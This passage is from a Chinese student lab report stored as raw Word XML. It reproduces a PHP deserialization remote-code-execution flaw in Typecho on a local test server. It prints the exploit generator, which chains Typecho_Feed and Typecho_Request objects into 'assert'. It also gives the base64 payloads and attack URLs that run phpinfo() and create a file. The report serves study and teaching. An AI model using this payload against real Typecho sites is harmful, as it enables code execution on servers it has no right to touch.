                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'screenName'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] = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'phpinfo()'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;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攻击载荷：要执行的 PHP 代码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58B6F4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$this-&gt;_filter[0] = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'assert'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;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恶意函数：将执行上述代码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5092ED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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67C266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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AC0FE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</w:p>
          <w:p w14:paraId="28AF13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构造一个待序列化的数组 $exp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3557AB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这个数组的 'adapter' 键的值是一个 Typecho_Feed 的新实例。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52D5BD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这是为了模拟目标 Typecho 代码中的 `$config['adapter']` 部分，</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="165BB8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确保反序列化后 `$config['adapter']` 是我们控制的 Typecho_Feed 对象。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="734D6E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$exp =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array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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00BC72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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'adapter'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=&gt;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new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2B91AF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>Typecho_Feed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()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="118973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);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C2206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</w:p>
          <w:p w14:paraId="28F19A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对 $exp 数组进行序列化，然后进行 Base64 编码。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="305EDA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这样就生成了可以作为 GET 参数 `__typecho_config` 传递的恶意 payload。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68CB97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echo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base64_encode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serialize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($exp));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53ACEA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eastAsia="新宋体"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="800000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59F9529F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7577EA96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以上代码正是为了生成一个恶意的序列化字符串，用于触发之前分析的 Typecho 反序列化漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B2ACF5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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$exp 数组的构造</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C634688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$exp = array('adapter' =&gt; new Typecho_Feed());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B045148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这行代码创建了一个数组 $exp。它的 'adapter' 键的值被设置为一个新的 Typecho_Feed 类的实例。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FA80FA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 new Typecho_Feed() 被调用时，Typecho_Feed::__construct() 也会被执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5318E89B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0"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Typecho_Feed::__construct() 的执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524D1128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在Typecho_Feed::__construct()内部：$this-&gt;item=array('author'=&gt;new Typecho_Request());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D62FE6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这会进一步实例化一个 Typecho_Request 对象，并将其赋值给 Typecho_Feed 实例的 $item['author'] 属性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EA6616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 new Typecho_Request() 被调用时，Typecho_Request::__construct() 也会被执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252D959B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0"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Typecho_Request::__construct() 的执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF24778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Typecho_Request::__construct() 内部：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533CD72E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$this-&gt;_params['screenName'] = 'phpinfo()';：设置了 Typecho_Request 对象的 _params 属性，其中的 screenName 键的值是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>phpinfo()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。这是我们希望最终执行的 PHP 代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799A3065">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D80F654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$this-&gt;_filter[0] = 'assert';：设置了 Typecho_Request 对象的 _filter 属性，其中的第一个元素是字符串 'assert'。assert 函数在 PHP 中可以执行字符串作为 PHP 代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEB0072">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0"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序列化过程 (serialize($exp))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F30348B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serialize() 函数会递归地将 $exp 数组及其包含的对象（Typecho_Feed 实例和其内部的 Typecho_Request 实例）转换为一个字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351B3E72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生成的序列化字符串将精确地描述这些对象的类名、属性以及它们的私有属性值（包括 Typecho_Feed 的 item 和 Typecho_Request 的 _params 和 _filter）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3885D15A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0"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Base64 编码 (base64_encode(...))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206823C6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序列化字符串被 Base64 编码，使其适合在 URL 中作为 GET 参数传递。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE1A9E3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27CF4012">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>复现漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E85A41">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF78F3A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访问http://127.0.0.1/exe.php，即可获得payload。这里获得的payload是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D369D03">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>YToxOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6MTp7czoxODoiAFR5cGVjaG9fRmVlZABpdGVtIjthOjE6e3M6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF5278A">
      <w:pPr>
        <w:widowControl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1692910"/>
            <wp:effectExtent l="9525" t="9525" r="1778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929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28C6CF4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54A98C5D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发送攻击请求，访问：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700F40C1">
      <w:pPr>
        <w:widowControl w:val="0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http://127.0.0.1/typecho.php?__typecho_config=YToxOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6MTp7czoxODoiAFR5cGVjaG9fRmVlZABpdGVtIjthOjE6e3M6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50446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得到如下界面，说明成功执行了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>phpinfo()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270A7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hd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="4402455"/>
            <wp:effectExtent l="0" t="0" r="190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0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EEC1E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5716DBBD">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>四</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>执行其他系统命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1195C290">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47ABD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假设想让目标服务器执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>fopen(\'newfile.txt\', \'w\');</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这个命令，来创建一个新文件newfile.txt。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E82C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修改后的exe.php如下：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030A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99FEF5"/>
          </w:tcPr>
          <w:p w14:paraId="4D74AE09">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="新宋体"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21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新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exe.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="46E9F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8" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="164EDF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800000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66F401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class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2B91AF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>Typecho_Feed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5224B1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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="502940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private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$item;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="034317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</w:p>
          <w:p w14:paraId="170A04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public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function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__construct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(){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67433A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$this-&gt;item =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array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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CFB4C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    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'author'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=&gt;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new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2B91AF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>Typecho_Request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(),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4541EE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);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="723266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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A3FF1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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0665ED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</w:p>
          <w:p w14:paraId="76ECA8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class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2B91AF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>Typecho_Request</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32F018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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="488079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private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$_params =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array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();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A6A12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private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$_filter =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array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();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="653986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</w:p>
          <w:p w14:paraId="7CD11F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public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function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__construct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(){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="341830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eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="008000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
                <w:lang w:eastAsia="zh-CN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$this-&gt;_params[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'screenName'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] = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="A31515"/>
                <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>fopen(\'newfile.txt\', \'w\');</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'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;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 xml:space="preserve">// </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="008000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>修改此处</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0468FC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    $this-&gt;_filter[0] = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'assert'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; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="008000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>// 恶意函数：将执行上述代码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01658B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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30C1EA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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5826B4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</w:p>
          <w:p w14:paraId="7F8DF0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$exp =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array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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="293635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   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'adapter'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=&gt;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new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2B91AF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>Typecho_Feed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()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76EFEE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);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42D458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</w:p>
          <w:p w14:paraId="67E459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</w:pP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echo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base64_encode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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>serialize</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>($exp));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="542A0D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exact"/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="新宋体"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="800000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E270B6A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49043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得到的payload如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BE5549">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/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>YToxOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6MTp7czoxODoiAFR5cGVjaG9fRmVlZABpdGVtIjthOjE6e3M6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjI2OiJmb3BlbignbmV3ZmlsZS50eHQnLCAndycpOyI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FCBC74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发送攻击请求，访问：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7ED918">
      <w:pPr>
        <w:widowControl w:val="0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http://127.0.0.1/typecho.php?__typecho_config=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>YToxOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6MTp7czoxODoiAFR5cGVjaG9fRmVlZABpdGVtIjthOjE6e3M6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjI2OiJmb3BlbignbmV3ZmlsZS50eHQnLCAndycpOyI7fXM6MjQ6IgBUeXBlY2hvX1J</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>lcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA1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发现真的新建了文件newfile.txt，说明攻击成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5B2CBF">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1188085" cy="560705"/>
            <wp:effectExtent l="9525" t="9525" r="2159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8085" cy="5607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454F313B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30D45861">
      <w:pPr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sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>四、心得体会</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4F5DD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C11805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通过本次反序列化漏洞复现实验，我深刻认识到软件安全的重要性。通过亲手构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
